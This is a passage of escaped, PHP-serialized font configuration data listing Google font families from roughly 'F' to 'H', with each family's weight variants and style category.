Sans\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Explora\";a:3:{s:5:\"label\";s:7:\"Explora\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Fahkwang\";a:3:{s:5:\"label\";s:8:\"Fahkwang\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Fanwood Text\";a:3:{s:5:\"label\";s:12:\"Fanwood Text\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Farro\";a:3:{s:5:\"label\";s:5:\"Farro\";s:8:\"variants\";a:4:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Farsan\";a:3:{s:5:\"label\";s:6:\"Farsan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Fascinate\";a:3:{s:5:\"label\";s:9:\"Fascinate\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Fascinate Inline\";a:3:{s:5:\"label\";s:16:\"Fascinate Inline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Faster One\";a:3:{s:5:\"label\";s:10:\"Faster One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Fasthand\";a:3:{s:5:\"label\";s:8:\"Fasthand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Fauna One\";a:3:{s:5:\"label\";s:9:\"Fauna One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Faustina\";a:3:{s:5:\"label\";s:8:\"Faustina\";s:8:\"variants\";a:12:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Federant\";a:3:{s:5:\"label\";s:8:\"Federant\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Federo\";a:3:{s:5:\"label\";s:6:\"Federo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Felipa\";a:3:{s:5:\"label\";s:6:\"Felipa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Fenix\";a:3:{s:5:\"label\";s:5:\"Fenix\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Festive\";a:3:{s:5:\"label\";s:7:\"Festive\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Finger Paint\";a:3:{s:5:\"label\";s:12:\"Finger Paint\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Fira Code\";a:3:{s:5:\"label\";s:9:\"Fira Code\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:9:\"Fira Mono\";a:3:{s:5:\"label\";s:9:\"Fira Mono\";s:8:\"variants\";a:3:{i:0;s:3:\"500\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:9:\"Fira Sans\";a:3:{s:5:\"label\";s:9:\"Fira Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Fira Sans Condensed\";a:3:{s:5:\"label\";s:19:\"Fira Sans Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:25:\"Fira Sans Extra Condensed\";a:3:{s:5:\"label\";s:25:\"Fira Sans Extra Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Fjalla One\";a:3:{s:5:\"label\";s:10:\"Fjalla One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Fjord One\";a:3:{s:5:\"label\";s:9:\"Fjord One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Flamenco\";a:3:{s:5:\"label\";s:8:\"Flamenco\";s:8:\"variants\";a:2:{i:0;s:3:\"300\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Flavors\";a:3:{s:5:\"label\";s:7:\"Flavors\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Fleur De Leah\";a:3:{s:5:\"label\";s:13:\"Fleur De Leah\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Flow Block\";a:3:{s:5:\"label\";s:10:\"Flow Block\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Flow Circular\";a:3:{s:5:\"label\";s:13:\"Flow Circular\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Flow Rounded\";a:3:{s:5:\"label\";s:12:\"Flow Rounded\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Fondamento\";a:3:{s:5:\"label\";s:10:\"Fondamento\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:16:\"Fontdiner Swanky\";a:3:{s:5:\"label\";s:16:\"Fontdiner Swanky\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Forum\";a:3:{s:5:\"label\";s:5:\"Forum\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Francois One\";a:3:{s:5:\"label\";s:12:\"Francois One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Frank Ruhl Libre\";a:3:{s:5:\"label\";s:16:\"Frank Ruhl Libre\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"700\";i:3;s:3:\"900\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Fraunces\";a:3:{s:5:\"label\";s:8:\"Fraunces\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Freckle Face\";a:3:{s:5:\"label\";s:12:\"Freckle Face\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:20:\"Fredericka the Great\";a:3:{s:5:\"label\";s:20:\"Fredericka the Great\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Fredoka One\";a:3:{s:5:\"label\";s:11:\"Fredoka One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Freehand\";a:3:{s:5:\"label\";s:8:\"Freehand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Fresca\";a:3:{s:5:\"label\";s:6:\"Fresca\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Frijole\";a:3:{s:5:\"label\";s:7:\"Frijole\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Fruktur\";a:3:{s:5:\"label\";s:7:\"Fruktur\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Fugaz One\";a:3:{s:5:\"label\";s:9:\"Fugaz One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Fuggles\";a:3:{s:5:\"label\";s:7:\"Fuggles\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Fuzzy Bubbles\";a:3:{s:5:\"label\";s:13:\"Fuzzy Bubbles\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"GFS Didot\";a:3:{s:5:\"label\";s:9:\"GFS Didot\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"GFS Neohellenic\";a:3:{s:5:\"label\";s:15:\"GFS Neohellenic\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Gabriela\";a:3:{s:5:\"label\";s:8:\"Gabriela\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Gaegu\";a:3:{s:5:\"label\";s:5:\"Gaegu\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Gafata\";a:3:{s:5:\"label\";s:6:\"Gafata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Galada\";a:3:{s:5:\"label\";s:6:\"Galada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Galdeano\";a:3:{s:5:\"label\";s:8:\"Galdeano\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Galindo\";a:3:{s:5:\"label\";s:7:\"Galindo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Gamja Flower\";a:3:{s:5:\"label\";s:12:\"Gamja Flower\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Gayathri\";a:3:{s:5:\"label\";s:8:\"Gayathri\";s:8:\"variants\";a:3:{i:0;s:3:\"100\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Gelasio\";a:3:{s:5:\"label\";s:7:\"Gelasio\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Gemunu Libre\";a:3:{s:5:\"label\";s:12:\"Gemunu Libre\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Genos\";a:3:{s:5:\"label\";s:5:\"Genos\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Gentium Basic\";a:3:{s:5:\"label\";s:13:\"Gentium Basic\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Gentium Book Basic\";a:3:{s:5:\"label\";s:18:\"Gentium Book Basic\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:3:\"Geo\";a:3:{s:5:\"label\";s:3:\"Geo\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Georama\";a:3:{s:5:\"label\";s:7:\"Georama\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Geostar\";a:3:{s:5:\"label\";s:7:\"Geostar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Geostar Fill\";a:3:{s:5:\"label\";s:12:\"Geostar Fill\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Germania One\";a:3:{s:5:\"label\";s:12:\"Germania One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Gideon Roman\";a:3:{s:5:\"label\";s:12:\"Gideon Roman\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Gidugu\";a:3:{s:5:\"label\";s:6:\"Gidugu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Gilda Display\";a:3:{s:5:\"label\";s:13:\"Gilda Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Girassol\";a:3:{s:5:\"label\";s:8:\"Girassol\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Give You Glory\";a:3:{s:5:\"label\";s:14:\"Give You Glory\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Glass Antiqua\";a:3:{s:5:\"label\";s:13:\"Glass Antiqua\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Glegoo\";a:3:{s:5:\"label\";s:6:\"Glegoo\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Gloria Hallelujah\";a:3:{s:5:\"label\";s:17:\"Gloria Hallelujah\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Glory\";a:3:{s:5:\"label\";s:5:\"Glory\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Gluten\";a:3:{s:5:\"label\";s:6:\"Gluten\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Goblin One\";a:3:{s:5:\"label\";s:10:\"Goblin One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Gochi Hand\";a:3:{s:5:\"label\";s:10:\"Gochi Hand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Goldman\";a:3:{s:5:\"label\";s:7:\"Goldman\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Gorditas\";a:3:{s:5:\"label\";s:8:\"Gorditas\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Gothic A1\";a:3:{s:5:\"label\";s:9:\"Gothic A1\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Gotu\";a:3:{s:5:\"label\";s:4:\"Gotu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Goudy Bookletter 1911\";a:3:{s:5:\"label\";s:21:\"Goudy Bookletter 1911\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Gowun Batang\";a:3:{s:5:\"label\";s:12:\"Gowun Batang\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Gowun Dodum\";a:3:{s:5:\"label\";s:11:\"Gowun Dodum\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Graduate\";a:3:{s:5:\"label\";s:8:\"Graduate\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Grand Hotel\";a:3:{s:5:\"label\";s:11:\"Grand Hotel\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Grandstander\";a:3:{s:5:\"label\";s:12:\"Grandstander\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Gravitas One\";a:3:{s:5:\"label\";s:12:\"Gravitas One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Great Vibes\";a:3:{s:5:\"label\";s:11:\"Great Vibes\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Grechen Fuemen\";a:3:{s:5:\"label\";s:14:\"Grechen Fuemen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Grenze\";a:3:{s:5:\"label\";s:6:\"Grenze\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Grenze Gotisch\";a:3:{s:5:\"label\";s:14:\"Grenze Gotisch\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Grey Qo\";a:3:{s:5:\"label\";s:7:\"Grey Qo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Griffy\";a:3:{s:5:\"label\";s:6:\"Griffy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Gruppo\";a:3:{s:5:\"label\";s:6:\"Gruppo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Gudea\";a:3:{s:5:\"label\";s:5:\"Gudea\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Gugi\";a:3:{s:5:\"label\";s:4:\"Gugi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Gupter\";a:3:{s:5:\"label\";s:6:\"Gupter\";s:8:\"variants\";a:3:{i:0;s:3:\"500\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Gurajada\";a:3:{s:5:\"label\";s:8:\"Gurajada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Gwendolyn\";a:3:{s:5:\"label\";s:9:\"Gwendolyn\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Habibi\";a:3:{s:5:\"label\";s:6:\"Habibi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Hachi Maru Pop\";a:3:{s:5:\"label\";s:14:\"Hachi Maru Pop\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Hahmlet\";a:3:{s:5:\"label\";s:7:\"Hahmlet\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Halant\";a:3:{s:5:\"label\";s:6:\"Halant\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"Hammersmith One\";a:3:{s:5:\"label\";s:15:\"Hammersmith One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Hanalei\";a:3:{s:5:\"label\";s:7:\"Hanalei\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Hanalei Fill\";a:3:{s:5:\"label\";s:12:\"Hanalei Fill\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Handlee\";a:3:{s:5:\"label\";s:7:\"Handlee\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Hanuman\";a:3:{s:5:\"label\";s:7:\"Hanuman\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"900\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Happy Monkey\";a:3:{s:5:\"label\";s:12:\"Happy Monkey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Harmattan\";a:3:{s:5:\"label\";s:9:\"Harmattan\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Headland One\";a:3:{s:5:\"label\";s:12:\"Headland One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Heebo\";a:3:{s:5:\"label\";s:5:\"Heebo\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Henny Penny\";a:3:{s:5:\"label\";s:11:\"Henny Penny\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Hepta Slab\";a:3:{s:5:\"label\";s:10:\"Hepta Slab\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"Herr Von Muellerhoff\";a:3:{s:5:\"label\";s:20:\"Herr Von Muellerhoff\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Hi Melody\";a:3:{s:5:\"label\";s:9:\"Hi Melody\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:11:\"Hina Mincho\";a:3:{s:5:\"label\";s:11:\"Hina 